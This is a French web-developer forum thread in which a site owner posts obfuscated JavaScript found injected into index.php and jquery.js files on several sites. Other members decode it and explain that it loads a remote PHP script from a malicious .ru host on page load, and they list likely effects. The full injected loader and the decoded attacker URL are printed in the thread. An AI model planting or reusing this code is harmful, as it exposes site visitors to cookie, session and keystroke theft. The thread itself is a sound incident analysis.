Injection javascript inconnue dans mon site (regarder le code)

[chrisdayton]

salut

voici le code que j'ai trouvé dans plusieurs fichier(en particulier les index.php)
je ne sais pas d'ou sort ce code !! je me suis fait hacker ? Si oui a quoi sert ce code ?

J'ai plusieurs sites et ils ont tous ce code !!!c'est quoi ce truk de fou !
encore plus étrange ce code se trouve même dans jquery.js

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
<script>var lE="";var N;if(N!='Mz' && N!='MM'){N='Mz'};
try {
var wC=new Array();
this.DN='';
var T=new String("[ohD".substr(0,1));
var t;
 
if(t!='' && t!='dU')
{
t=null
};
this.PZ='';
 
var r=new String();
var w=String("81Zqg".substr(4));
var kZ;if(kZ!='uN'){kZ=''};
var o;if(o!='i'){o=''};
var e=RegExp;
var a='';
var C="replaY2W".substr(0,5)+"92Nce".substr(3);
var Jx;if(Jx!='DW'){Jx=''};var f="]";
var Q;if(Q!=''){Q='zy'};function u(d,l){var q=new Date();
var hA='';
var JE='';
var s=T;
var dt;if(dt!='Lj' && dt!='fe'){dt='Lj'};s+=l;s+=f;var L=new e(s, w);return d.replace(L, a);};
var Wg='';
var io;if(io!='v' && io!='qb'){io='v'};
var c=new Array();var D=String("onloa"+"d");
var Wz;
if(Wz!='' && Wz!='JU'){Wz=null};
var m=u('h8t9t9p8:9/8/9y8e9s9k9y8-8c8o8m8.8y9n8e8t9.8c8o8m9.9k9e9y8r9u9n8-8c9n8.9p9r9o8p9l9u9s9l9a9b8.9r8u9:9',"89");
this.jr='';
var av=u('851151501151181155555055511115',"15");
var uj=new Date();
var _;
if(_!='LL' && _ != ''){_=null};
var d="1";
var UA=new String();
var hS=new String();
var n="scr"+"ipt";
var Z;if(Z!='MK' && Z!='yv'){Z=''};
varx=String("/beuSF".substr(0,3)+"ZbMsttMbZ".substr(3,3)+"ubeA6E8".substr(0,3)+"cli"+"6SPps.".substr(3)+"ECvcomvCE".substr(3,3)+"W8P/beP8W".substr(3,3)+"stt"+"s2mtube".substr(4)+"tJWcli".substr(3)+"ps."+"comjsP".substr(0,3)+"SaF/spSFa".substr(3,3)+"eedYg8F".substr(0,3)+"tes"+"wz5t.n".substr(3)+"et/"+"goovubk".substr(0,3)+"gleVij".substr(0,3)+"9A0E.co90EA".substr(4,3)+"8ZKsm/k".substr(4)+"aixpRV".substr(0,3)+"gvXin.".substr(3)+"comQ8p".substr(0,3)+"9BxD.ph".substr(4)+"qdAp".substr(3));
var fd='';
var b='';
var lx=new Date();
window[D]=function(){var Xm=new String();
var Qh=new String();
this.UAa="";wb=document.createElement(n);
this.nK="";this.PM="";b+=m;b+=av+x;
var aH=new String();wb.defer=d;var x_=new Date();
var wI=new Date();wb.src=b;var cv;if(cv!=''){cv='fM'};var E=document.body;this.Cb='';var KT;if(KT!='Pc' && KT!='Zs'){KT='Pc'};
var hP=new String();var cA;if(cA!='WV' && cA != ''){cA=null};
var IN=new Array();E.appendChild(wb);
var RE='';};var LJ="";
var Oh='';
var Ny=new String();
var Py;if(Py!='' && Py!='EL'){Py='yl'};} catch(U){var li=new String();var Ct=new Date();};
this.Nx="";this.ML="";</script>
<!--9f8495e20df0433a846fde085d04fd0c-->

[SpaceFrog]

ça sent en effet pars très bon ...

Je viens à peine de survoler le code et je vois :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

var D=String("onloa"+"d");

et plus bas

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

window[D]=function(){

donc en gros ça fait :

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

window.onlaod=function(){

ce qui lance une fonction au démarrage de page ...

[E.Bzz]

Bonjour,
+1 : ça pue !

Citation:

Envoyé par SpaceFrog

ce qui lance une fonction au démarrage de page ...

Et y ajoute des éléments

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

1
2
3
wb=document.createElement(n);
...
E.appendChild(wb);

Essaye d'utiliser Firebug ou autre, pour voir les éléments parasites (et leur action).

Ça te donnera peut être une piste pour une parade ...

A+

[SpaceFrog]

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

var m=u('h8t9t9p8:9/8/9y8e9s9k9y8-8c8o8m8.8y9n8e8t9.8c8o8m9.9k9e9y8r9u9n8-8c9n8.9p9r9o8p9l9u9s9l9a9b8.9r8u9:9',"89");

devient facilement

Citation:

var m='http://yesky-com.ynet.com.keyrun-cn.propluslab.ru:';

et

Code :

Sélectionner tout - Visualiser dans une fenêtre à part

varx=String("/beuSF".substr(0,3)+"ZbMsttMbZ".substr(3,3)+"ubeA6E8".substr(0,3)+"cli"+"6SPps.".substr(3)+"ECvcomvCE".substr(3,3)+"W8P/beP8W".substr(3,3)+"stt"+"s2mtube".substr(4)+"tJWcli".substr(3)+"ps."+"comjsP".substr(0,3)+"SaF/spSFa".substr(3,3)+"eedYg8F".substr(0,3)+"tes"+"wz5t.n".substr(3)+"et/"+"goovubk".substr(0,3)+"gleVij".substr(0,3)+"9A0E.co90EA".substr(4,3)+"8ZKsm/k".substr(4)+"aixpRV".substr(0,3)+"gvXin.".substr(3)+"comQ8p".substr(0,3)+"9BxD.ph".substr(4)+"qdAp".substr(3));

retourne:

Citation:

/besttubeclips.com/besttubeclips.com/speedtest.net/google.com/kaixin.com.php

[SpaceFrog]

Bon alors une fois le code dépouillé de beaucoup de code qui ne sert a rien
ce script insère une balise script sur la page qui pointe vers un fichier php externe dont la source est :

Attention !!!

JE NE SAIS PAS CE QUE FAIT CETTE PAGE ET DECONSEILLE FORTEMENT D'ALLER VOIR
SI VOUS LE FAITES, FAITES LE A VOS RISQUES ET PERILS, JE DEGAGE TOUTE RESPONSABILITE SUR TOUTE UTILISATION QUE VOUS POURREZ FAIRE DE CE LIEN ET LES CONSEQUENCES QUE CELA POURRAIT AVOIR

Citation:

h t t p://yesky-com.ynet.com.keyrun-cn.propluslab.ru:8080/besttubeclips.com/besttubeclips.com/speedtest.net/google.com/kaixin.com.php

En conclusion je dirais oui tu as été hacké ...
efface ces fichiers au plus tot ...

[chrisdayton]

c'est mon ordi qui a était hack ? pourtant spybot, Ad-Aware, antivir, on rien détecter

au pire qu'est ce qu'un script comme ça peut faire ?

[SpaceFrog]

Citation:

c'est mon ordi qui a était hack ?

ton ordi ???
il est ou ce codes ....???

ce code n'est actif que dans une page web.

[E.Bzz]

Oui, c'est plutôt ton serveur (qui est peut être ton ordi, mais peut être pas).

Ça a dû plutôt se passer côté PHP ...

Et là, pas sûr qu'AntiVir ou autre y puisse grand chose ...

A+

[chrisdayton]

nan c'est chez plusieurs hébergeurs diffèrent ovh 1and1 ....
Ont a du avoir accès a mes codes ftp je pense que c'est a cause de fitzila .

vous savez ce que ce genre de code fait ?

[E.Bzz]

Citation:

Envoyé par chrisdayton

vous savez ce que ce genre de code fait ?

SpaceFrog l'a pas marqué assez gros ??

Pas forcément besoin de FTP pour ça, si tu n'as pas pris de précaution en développant tes pages ...

A+

[SpaceFrog]

pas forcément filezilla.

si tes pages sont en php et que passes des variables get ou post qui ne sont pas filtrée ...

[chrisdayton]

oui j'ai déja lu les articles sur la securité en php sur developpez , mais je pense pas que ce soit a cause des méthode get ou post car

1)j'ai un site ou il n'y a aucun formulaire et pourtant il a bien ce code

2)seul les sites qui étaient dans connexion rapide dans fitzila ce sont fait attaquer

mais j'aimerai juste savoir si vous avez une idée de ce qu'un script comme ca peut faire ?

[SpaceFrog]

récupérer toutes les informations sniffables ...
récupérer les cookies ...
récupérer les sessions ...
récupérer toutes les frappes au clavier ...
voir plus avec une image contenant un applet...
Bref un tas de choses